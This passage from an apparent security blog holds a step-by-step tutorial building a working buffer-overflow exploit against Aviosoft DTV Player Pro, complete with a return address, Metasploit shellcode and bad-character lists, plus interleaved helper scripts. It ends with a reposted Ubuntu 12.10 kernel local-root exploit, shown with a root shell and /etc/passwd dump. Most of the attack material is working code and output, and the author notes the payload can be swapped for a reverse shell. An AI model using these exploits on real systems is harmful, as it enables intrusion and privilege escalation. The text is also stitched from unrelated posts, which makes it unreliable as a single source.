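    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]        # length > 20280: pattern exhausted


def pattern_offset(value, length=2000):
    """Where in the sent pattern the 4 bytes now sitting in a register came from.
    `value` is either the register as the debugger prints it (8 hex digits,
    most significant byte first) or the 4 characters themselves. x86 is
    little-endian, so the printed dword has to be byte-reversed before
    searching: 0x37694136 is the bytes 36 41 69 37 = "6Ai7" in memory."""
    if len(value) == 8 and all(c in string.hexdigits for c in value):
        needle = struct.pack("<I", int(value, 16)).decode("ascii")
    else:
        needle = value
    return pattern_create(length).find(needle)   # -1 if the value did not come from the pattern


if __name__ == "__main__":
    pat = pattern_create(2000)
    print(pat[:24] + "..." + pat[-8:])
    print("EIP 37694136 -> offset", pattern_offset("37694136"))
```

A return of -1 means the register did not come from your pattern at all (for example it holds a pointer or a partially overwritten value), which is the first thing to check before trusting an offset.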

Let’s modify the script again:

print "Creating exploit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260 #Offset found by mona.py
eip ="BBBB" #4 more bytes to overwrite EIP
junk="C"*1736 #Later replaced with real shellcode (2000-264)

try:
    f.write(push+eip+junk)
    f.close()
    print "File created"
except:
    print "File cannot be created"

In the script I replaced the cyclic pattern with 260 bytes of “A”, 4 more bytes “BBBB” to overwrite EIP, then 1736 bytes of “C” (2000-264). If the first 260 bytes of junk are the right length then EIP will be “BBBB”. Let's try:

EIP is 42424242 = “BBBB” and ESP (the stack pointer) points at “CCCC…”. Note that the “C”s start right after the saved EIP:

0012EB5C   42424242  BBBB
0012EB60 43434343 CCCC
0012EB64 43434343 CCCC
0012EB68 43434343 CCCC
0012EB6C 43434343 CCCC


We need to deal with this junk right after EIP; see later on. Anyway, we are controlling EIP, because it holds “BBBB”.

Our next goals will be:

1. Replacing “BBBB” with a valid pointer (a pointer to a JMP ESP, since ESP points at our data).
2. Solving the easy problem of the “CCCC…” after EIP.
3. Replacing “CCCCCC…” with real shellcode.

FIND EIP
Let's find an address for EIP. It can be found in the application's DLLs or in OS DLLs. For reliability we should prefer the application's own DLLs when possible: as mona's output shows below (ASLR: False, Rebase: False), they load at the same address every time, whereas OS DLL addresses differ between Windows versions and patch levels. So for this application I will look for the EIP address in the application's DLLs. Again I will use mona (mona is very powerful and I know what I am doing). The command is:

!mona jmp -r esp -o


It creates a file called “jmp.txt” in “C:\mona\AviosoftDTV” with the following contents:

0x6034c153 : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034c4db : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034d9cb : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034dc73 : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x640614e3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll)
0x640627a3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll)
0x64119bc3 : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\NetReg.dll)
0x6411a7ab : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\NetReg.dll)

Here I will use 0x6411a7ab. Before that, for learning purposes, let's find this address manually with Immunity Debugger itself (first we need to trigger the crash, otherwise not all DLLs are loaded yet):

1. Immunity Debugger menu: View >> Executable Modules.
2. Find “NetReg.dll” and double-click it:

3. Our goal is to find a “JMP ESP”.
4. Right-click in the window and choose Search for >> All commands

5. In the window that pops up, search for “jmp esp”

I kept searching until I found 0x6411a7ab.

ATTEMPT TO EXECUTE SHELLCODE
Anyway, back to the real work. We need to modify the script and put the address in the EIP variable instead of “BBBB”. Remember that x86 Windows is little-endian, so the bytes of the address must be reversed: EIP 0x6411a7ab becomes "\xab\xa7\x11\x64". Here is the modified script:

print "Creating exploit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260 #Offset found by mona.py
eip ="\xab\xa7\x11\x64" #EIP: 0x6411a7ab, little-endian
junk="C"*1500 #Later replaced with real shellcode

try:
    f.write(push+eip+junk)
    f.close()
    print "File created"
except:
    print "File cannot be created"

Run the application through the debugger and EIP should now hold the exact address I set. Time to make the application execute shellcode, so I am modifying the script again to make it more robust:

print "Creating exploit."
f=open("crash-me.PLF","w") #Create the file

push="\x90"*260 #Offset found by mona.py, "A" replaced with NOPs
eip ="\xab\xa7\x11\x64" #EIP: 0x6411a7ab, little-endian
junk="\x90"*500 #More NOPs before reaching the shellcode
shellcode="D"*1000 #Will be replaced with shellcode
try:
    f.write(push+e
ip+junk+shellcode)
    f.close()
    print "File created"
except:
    print "File cannot be created"
What I did in the script above is replace all the “A”s with NOPs. A NOP does nothing but pass control to the next instruction. Earlier I mentioned the unwanted “CCCC…” after EIP: once the JMP ESP lands, execution continues at the bytes right after the saved EIP, so that region must be a NOP sled that slides into the shellcode rather than junk. Putting enough NOPs there solves this problem. Before going to the next step, let's test whether it works as I expect.

1. Set a breakpoint at the EIP address 0x6411a7ab to make sure our exploit reaches the right address. To do that:

Right-click >> Go to >> Expression

2. In the window that pops up, enter the EIP address; you may need to search twice. When the address is found we see this:

3. Now press F2. It may warn you about setting a breakpoint at this address, but you can ignore the warning. Now I open the file (attached to the debugger). It hits the breakpoint and I can see I land directly in the NOPs:

So it worked!

Let's put real shellcode in place of the “D”s. Time to use Metasploit to generate windows/exec shellcode that runs calc.exe:

msfpayload windows/exec cmd=calc R | msfencode -b "\x00\x0a" -t c

I excluded the usual bad chars “\x00\x0a”, and Metasploit generated the following shellcode:

 

[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] =
"\xbe\x28\xc7\x1b\x1f\xd9\xed\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x32\x31\x70\x12\x83\xe8\xfc\x03\x58\xc9\xf9\xea\x64\x3d\x74"
"\x14\x94\xbe\xe7\x9c\x71\x8f\x35\xfa\xf2\xa2\x89\x88\x56\x4f"
"\x61\xdc\x42\xc4\x07\xc9\x65\x6d\xad\x2f\x48\x6e\x03\xf0\x06"
"\xac\x05\x8c\x54\xe1\xe5\xad\x97\xf4\xe4\xea\xc5\xf7\xb5\xa3"
"\x82\xaa\x29\xc7\xd6\x76\x4b\x07\x5d\xc6\x33\x22\xa1\xb3\x89"
"\x2d\xf1\x6c\x85\x66\xe9\x07\xc1\x56\x08\xcb\x11\xaa\x43\x60"
"\xe1\x58\x52\xa0\x3b\xa0\x65\x8c\x90\x9f\x4a\x01\xe8\xd8\x6c"
"\xfa\x9f\x12\x8f\x87\xa7\xe0\xf2\x53\x2d\xf5\x54\x17\x95\xdd"
"\x65\xf4\x40\x95\x69\xb1\x07\xf1\x6d\x44\xcb\x89\x89\xcd\xea"
"\x5d\x18\x95\xc8\x79\x41\x4d\x70\xdb\x2f\x20\x8d\x3b\x97\x9d"
"\x2b\x37\x35\xc9\x4a\x1a\x53\x0c\xde\x20\x1a\x0e\xe0\x2a\x0c"

Anyway, Let’s modify the script again:

print "Creating exploit."
f=open("crash-me.PLF","w") #Create the file

push="\x90"*260 #Offset found by mona.py
eip ="\xab\xa7\x11\x64" #EIP: 0x6411a7ab, little-endian
junk="\x90"*500 #500 NOPs before the real shellcode
shellcode=("\xbe\x28\xc7\x1b\x1f\xd9\xed\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x32\x31\x70\x12\x83\xe8\xfc\x03\x58\xc9\xf9\xea\x64\x3d\x74"
"\x14\x94\xbe\xe7\x9c\x71\x8f\x35\xfa\xf2\xa2\x89\x88\x56\x4f"
"\x61\xdc\x42\xc4\x07\xc9\x65\x6d\xad\x2f\x48\x6e\x03\xf0\x06"
"\xac\x05\x8c\x54\xe1\xe5\xad\x97\xf4\xe4\xea\xc5\xf7\xb5\xa3"
"\x82\xaa\x29\xc7\xd6\x76\x4b\x07\x5d\xc6\x33\x22\xa1\xb3\x89"
"\x2d\xf1\x6c\x85\x66\xe9\x07\xc1\x56\x08\xcb\x11\xaa\x43\x60"
"\xe1\x58\x52\xa0\x3b\xa0\x65\x8c\x90\x9f\x4a\x01\xe8\xd8\x6c"
"\xfa\x9f\x12\x8f\x87\xa7\xe0\xf2\x53\x2d\xf5\x54\x17\x95\xdd"
"\x65\xf4\x40\x95\x69\xb1\x07\xf1\x6d\x44\xcb\x89\x89\xcd\xea"
"\x5d\x18\x95\xc8\x79\x41\x4d\x70\xdb\x2f\x20\x8d\x3b\x97\x9d"
"\x2b\x37\x35\xc9\x4a\x1a\x53\x0c\xde\x20\x1a\x0e\xe0\x2a\x0c")
shellcode+="\x90"*900 #Okay, need enough padding, so NOPs instead of "A"

data=push+eip+junk+shellcode

try:
    f.write(data)
    f.close()
    print "File created"
except:
    print "File cannot be created"

Well, regenerate “crash-me.PLF” and open it with the attached Aviosoft DTV… unfortunately it just crashed.

It does not even land in the NOPs (wtf!). This looks like a bad-char problem: some of the code has been truncated. No problem, we can find the bad chars with mona, and this was my new lesson today: using mona to find bad chars easily. Bad chars corrupt or truncate our shellcode; if there are any, the exploit will not work!

So instead of spending a lot of time on it, I am going to use mona to find the bad chars (a good idea). I am using the first crash PoC again. Let's see how I did it.

                                                    

FINDING BAD CHARS
First command:

!mona bytearray -b "\x00"

“\x00” is a common bad char, so I excluded it when generating the byte array with mona.

Mona created two files in C:\mona\AviosoftDTV: 1. bytearray.txt 2. bytearray.bin. bytearray.bin is the binary version, which we will need later for comparing.

bytearray.txt contains the byte array shown in the script below. Modify the script and append it right after the variable push=“A”*2000:

print "Creating exploit."
f=open("badchar.PLF","w") #Create the file

push="A"*2000 #Junk from the first crash PoC
push+=("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") # byte array from mona, \x00 excluded

try:
    f.write(push)
    f.close()
    print "File created"
except:
    print "File cannot be created"

Now generate “badchar.PLF”. Attach the application to the debugger, run, open “badchar.PLF” and use another mona command:

!mona compare -f C:\mona\AviosoftDTV\bytearray.bin

It creates another file called “compare.txt”; open it in Notepad and search for “stack” (full output: http://pastebin.com/YLCnyne7). After scrolling down a little I can see:

File off | Mem off | File len | Mem len | File           | Memory         | Note
---------------------------------------------------------------------------------------
0        | 0       | 9        | 9       | 01 ... 09      | 01 ... 09      | unmodified!
9        | 9       | 99       | 100     | 0a ... 6c      | 00 ... 61      | expanded
108      | 109     | 1        | 1       | 6d             | 6d             | unmodified!
109      | 110     | 5        | 5       | 6e 6f 70 71 72 | 20 46 69 6c 65 | corrupted
114      | 115     | 1        | 1       | 73             | 73             | unmodified!
115      | 116     | 2        | 2       | 74 75          | 5c 41          | corrupted
117      | 118     | 1        | 1       | 76             | 76             | unmodified!
118      | 119     | 137      | 137     | 77 ... ff      | 69 ... 00      | corrupted

Possibly bad chars: 0a
Bytes omitted from input: 00

It compares the bytes in the file with what ended up in memory; the four numeric columns are the offset in the file, the offset in memory, the length in the file and the length in memory. If there were no bad chars, the File and Memory columns would be identical. Look at the second row:

9   9   99  100 | 0a ... 6c      | 00 ... 61      | expanded

Unfortunately it did not match: the chunk starting at offset 9 (the byte right after 01..09, i.e. 0a) is different in memory and it even grew by one byte. Mona therefore suggests that 0a may be a bad char, because 0a is the first byte in the file that does not match memory. Is it? Everything after the first bad char is shifted, so only the first mismatch can be trusted; the bytes reported as "corrupted" further down may be perfectly fine once 0a is gone.

So this time we need to generate the byte array again, without the bad chars found so far:

!mona bytearray -b "\x00\x0a"

Then we regenerate badchar.PLF with the new array and compare again with bytearray.bin (same command as above). Just keep doing it, one bad char per round, until the File and Memory columns match completely.
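The round-trip described above, as an added example that is not part of the original post and not mona's code: the target application is stood in for by a constructed parser, mangle(), that behaves the way the post observes (it stops at a NUL, expands 0x0a and drops a few other bytes, using the bad chars the post ends up finding), and find_bad_chars() automates the "regenerate, compare, exclude the first mismatch, repeat" loop that the post does by hand.

```python
"""Bad-character hunting, as an added example (not the original post's code).

mangle() is a constructed stand-in for the target's file parser, NOT AviSoft code:
it stops at the first NUL, expands 0x0a into 0x0d 0x0a and silently drops 0x0d,
0x1a and 0xff. find_bad_chars() then does what "!mona bytearray -b ..." followed
by "!mona compare" does by hand, one bad char per round.
"""


def mangle(data):
    """Constructed stand-in for the target's parser (assumption for the example)."""
    out = bytearray()
    for b in data:
        if b == 0x00:                  # C-string style copy: stops at the NUL
            break
        if b == 0x0a:                  # text-mode style newline translation
            out += b"\x0d\x0a"
        elif b in (0x0d, 0x1a, 0xff):  # dropped outright
            continue
        else:
            out.append(b)
    return bytes(out)


def bytearray_without(excluded):
    """Same idea as !mona bytearray -b: every byte value except the excluded ones."""
    return bytes(b for b in range(256) if b not in excluded)


def first_mismatch(sent, seen):
    """What !mona compare reports as the first difference between file and memory:
    (offset, file byte), or None when memory matches byte for byte. A memory copy
    that is shorter than the file counts as a mismatch at the first missing offset."""
    for i, b in enumerate(sent):
        if i >= len(seen) or seen[i] != b:
            return i, b
    return None


def find_bad_chars(read_memory, start_excluded=(0x00,)):
    """Repeat the post's manual loop: regenerate the array without the chars found so
    far, run it through the target, compare, and add the byte at the first mismatch.
    Only the first mismatch is trusted, because every byte after a dropped or
    expanded one is shifted and shows up as 'corrupted' even when it is fine."""
    excluded = set(start_excluded)
    while True:
        sent = bytearray_without(excluded)
        seen = read_memory(sent)
        hit = first_mismatch(sent, seen)
        if hit is None:
            return sorted(excluded)
        _, bad = hit
        if bad in excluded:            # would loop forever: the parser is not byte-stable
            raise RuntimeError("mismatch on a byte already excluded: %#04x" % bad)
        excluded.add(bad)


if __name__ == "__main__":
    sent = bytearray_without({0x00})
    print("first round:", first_mismatch(sent, mangle(sent)))   # (9, 10): offset 9, byte 0x0a
    print("bad chars:", ["%#04x" % b for b in find_bad_chars(mangle)])
```

The first round reproduces the compare table above (first mismatch at offset 9, file byte 0a); against a real target, read_memory would be replaced by "write the file, open it under the debugger, dump the buffer", which is exactly the part that cannot be automated from Python.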

                             

EXECUTE SHELLCODE

With mona I found the bad chars are "\x00\xff\x0a\x0d\x1a". After finding them I regenerated the shellcode, telling msfencode to avoid them:

root@pusheax.com:/usr/bin# msfpayload windows/exec cmd=calc R |msfencode -b "\x00\xff\x0a\x0d\x1a\xff" -t c
[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] =
"\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3"
"\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c"
"\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36"
"\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f"
"\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c"
"\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1"
"\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69"
"\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55"
"\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4"
"\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2"
"\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6"
"\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25"
"\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80"
"\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6"
"\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79";

Well, let's modify the script again and change the shellcode. The final, reliably working exploit is:

print "Creating exploit."
f=open("crash-me.PLF","w") #Create the file

push="\x90"*260 #Offset to EIP, found by mona.py
eip ="\xab\xa7\x11\x64" #EIP: 0x6411a7ab written little-endian, an address inside the application's own DLL
junk="\x90"*500 #500 nops before the real shellcode

#msfpayload windows/exec cmd=calc R |msfencode -b "\x00\xff\x0a\x0d\x1a\xff" -t c
shellcode=("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3"
"\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c"
"\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36"
"\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f"
"\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c"
"\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1"
"\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69"
"\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55"
"\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4"
"\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2"
"\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6"
"\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25"
"\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80"
"\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6"
"\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79")
shellcode+="\x90"*900 #Okay, we need enough junk after the shellcode too, so nops instead of "A"

payload=push+eip+junk+shellcode

try:
    f.write(payload)
    f.close()
    print "File created"
except:
    print "File cannot be created"

After regenerating crash-me.PLF, open it in AviSoft DTV and it will execute calc.exe. I did it under the debugger by pressing F9:

Any time we can swap the windows/exec shellcode for a reverse shell, which connects back to my specified IP address with a command shell.

The same exploit works on Windows 7 too:

That is because I used an EIP address from the application's own DLL. If I had used an address from an OS DLL the exploit would of course not work there, since those addresses differ between Windows versions (and, with ASLR, between reboots). That is the advantage of the application's DLL.
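The layout of the final exploit, rebuilt from numbers rather than hand-typed byte strings, as an added example that is not the post's script: the return address is packed little-endian (the post's "\xab\xa7\x11\x64" is 0x6411a7ab read that way), both the address and the shellcode are screened against the bad chars found above before anything is written, and the dword that will land on the saved EIP is checked at the expected offset. The 4-byte int3 shellcode is a constructed placeholder; the real payload is the msfencode output above.

```python
"""Payload layout check, as an added example (not the original post's script).

Builds the same layout the final exploit uses (padding up to EIP, the return
address, a NOP sled, the shellcode, trailing NOPs) and refuses to emit a file
that contains a bad character anywhere the target will copy. RET_ADDR is the
post's EIP bytes read as a little-endian dword; the shellcode in __main__ is a
constructed placeholder.
"""
import struct

BAD_CHARS = b"\x00\xff\x0a\x0d\x1a"   # the set the post found with mona
RET_ADDR = 0x6411a7ab                 # the post's "\xab\xa7\x11\x64" as a little-endian dword
EIP_OFFSET = 260                      # the post's push = "\x90"*260


def check_bad_chars(label, data, bad_chars=BAD_CHARS):
    """Raise ValueError naming the first bad character in data and where it sits."""
    for i, b in enumerate(data):
        if b in bad_chars:
            raise ValueError("%s contains bad char %#04x at offset %d" % (label, b, i))


def build_payload(shellcode, eip_offset=EIP_OFFSET, ret_addr=RET_ADDR,
                  sled=500, tail=900, bad_chars=BAD_CHARS):
    """padding + little-endian return address + NOP sled + shellcode + NOP tail,
    after checking that neither the address nor the shellcode carries a bad char."""
    eip = struct.pack("<I", ret_addr)          # x86 is little-endian: low byte first
    check_bad_chars("return address", eip, bad_chars)
    check_bad_chars("shellcode", shellcode, bad_chars)
    padding = b"\x90" * eip_offset
    return padding + eip + b"\x90" * sled + shellcode + b"\x90" * tail


def dword_at(payload, offset):
    """The four bytes that overwrite the saved EIP, read back as an integer."""
    return struct.unpack("<I", payload[offset:offset + 4])[0]


if __name__ == "__main__":
    shellcode = b"\xcc" * 4                     # constructed placeholder: four int3 instructions
    payload = build_payload(shellcode)
    assert dword_at(payload, EIP_OFFSET) == RET_ADDR
    # "wb": in text mode Python on Windows would turn every 0x0a into 0x0d 0x0a
    with open("crash-me.PLF", "wb") as f:
        f.write(payload)
    print("wrote %d bytes, EIP -> %#010x" % (len(payload), dword_at(payload, EIP_OFFSET)))
```

The bad-char screen matters for the address as much as for the shellcode: a return address containing 0x00 or 0x0a would be mangled by the same parser that mangled the byte array, so it is rejected up front instead of failing silently in the debugger.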

This is it!

Note: exploit writing is mostly research. Without research it is not possible to be an exploit writer. If you have questions or advice, please comment here or mail me and I will try to answer (I love to discuss!).
If you want to learn more about exploit development (in detail), read corelan's tutorials: https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/. Much better than other commercial training :).

Backtrack reborn as Kali – downloaded Kali Linux

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

BackTrack has been reborn as Kali Linux. Yesterday I downloaded Kali Linux from http://www.kali.org/downloads/; it has GNOME as the default DE (classic mode). Most penetration testers know BackTrack Linux, which was Ubuntu based. Kali is based on Debian, which is a big advantage. It is nicer too: they made it simpler and it looks beautiful.

It seems they did not include many new tools; maybe they even left some tools out of Kali Linux. There is also no /pentest directory any more.

All tools are installed in /usr/bin and /usr/local/sbin. People now need to search for tools with locate, whereis etc. if they don't know the name of the tool. Truthfully, Kali (BackTrack Linux) is now a bit hard for newbies, and a newbie should not try this pentesting distribution. But believe me, it is now good enough.

Note: using tools does not make you a skid. Everybody uses tools; the operating system itself is a tool. Skids are those who do things without knowing anything. You are good to go with the new Kali Linux if you are good with Linux (Debian).

Kali: http://www.kali.org/downloads/

Ubuntu 12.10 Local Root Exploit

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Everybody knows Ubuntu is a popular Linux distro (basically for newbies). Today I was visiting exploit-db and found the Ubuntu 12.10 local root exploit, which works only on 64-bit (it is the sock_diag netlink bug, CVE-2013-1763, with addresses hard-coded for the Ubuntu 12.10 x86_64 kernel).

I have tested the code since I already had Ubuntu 12.10 installed in my VM.

Code:

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

/* Runs in kernel context once the bogus handler pointer is followed:
 * replace the current task's credentials with root's. */
int __attribute__((regparm(3)))
x()
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

/* jmp qword ptr [rip+0], followed by the 8-byte address of x() that main() fills in */
char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

int main() {
    int fd;
    unsigned long mmap_start, mmap_size = 0x10000;
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
    char buf[8192];

    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
        printf("Can't create sock diag socket\n");
        return -1;
    }

    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;

    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

    /* Ubuntu 12.10 x86_64. A family above AF_MAX makes the kernel index past the
     * end of sock_diag_handlers[] and call whatever pointer it finds there. The two
     * kernel addresses are specific to this kernel build and differ on any other. */
    req.r.sdiag_family = 0x37;
    commit_creds = (_commit_creds) 0xffffffff8107d180;
    prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
    mmap_start = 0x1a000;

    /* Map user memory where the stray handler pointer is expected to point, fill
     * it with NOPs and place the jump to x() at the very end of the mapping. */
    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
             MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
        printf("mmap fault\n");
        exit(1);
    }

    /* patch the address of x() into the last 8 bytes of stage1 */
    *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
    memset((void *)mmap_start, 0x90, mmap_size);
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

    send(fd, &req, sizeof(req), 0);   /* triggers the out-of-bounds handler call */
    if(!getuid())
        system("/bin/sh");
    return 0;
}

test@weird:~/Documents$ gcc -o ubu *
test@weird:~/Documents$ ls
test.c ubu
test@weird:~/Documents$ ./ubu
# whoami
root

# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
